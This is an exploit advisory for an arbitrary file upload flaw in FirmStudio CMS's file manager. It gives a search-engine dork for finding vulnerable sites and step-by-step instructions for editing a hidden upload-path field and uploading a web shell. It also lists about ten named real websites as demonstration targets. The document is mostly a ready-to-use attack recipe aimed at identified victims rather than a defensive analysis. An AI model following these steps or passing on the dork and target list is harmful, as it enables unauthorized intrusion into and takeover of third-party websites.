###################### # Exploit Title : FirmStudio CMS (filemanager) Arbitrary File Upload # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://www.firmstudio.com # Google Dork : intext:"Website by FirmStudio" # Date: 23 May 2016 # Tested On : Kali # Contact:n3t.hacker@gmail.com ###########M########## # Exploit:include/filemanager/dialog.php # Describe : Search dork and select Target. Put include/filemanager/dialog.php After url such as : # http://site.com/include/filemanager/dialog.php # Now Hold shift Key and Right Click -> inspect element # Find : <input name="path" value="/client/site/site/uploaded_files/" type="hidden"> # You Can Change Upload Dir And Upload Shell # Demo : # http://www.hiphing.com.hk/include/filemanager/dialog.php # http://www.cornes.hk/include/filemanager/dialog.php # http://www.jinchuan-intl.com/include/filemanager/dialog.php # http://www.starrhotels.com/include/filemanager/dialog.php # http://www.jewelryshows.org/include/filemanager/dialog.php # http://www.mhh.com.hk/include/filemanager/dialog.php # http://www.metrokitchen.com.hk/include/filemanager/dialog.php # http://www.alisan.com.hk/include/filemanager/dialog.php # http://www.cornesworld.com/include/filemanager/dialog.php # http://www.hairworks.com.hk/include/filemanager/dialog.php # # ###################### # discovered by : Net Hacker ######################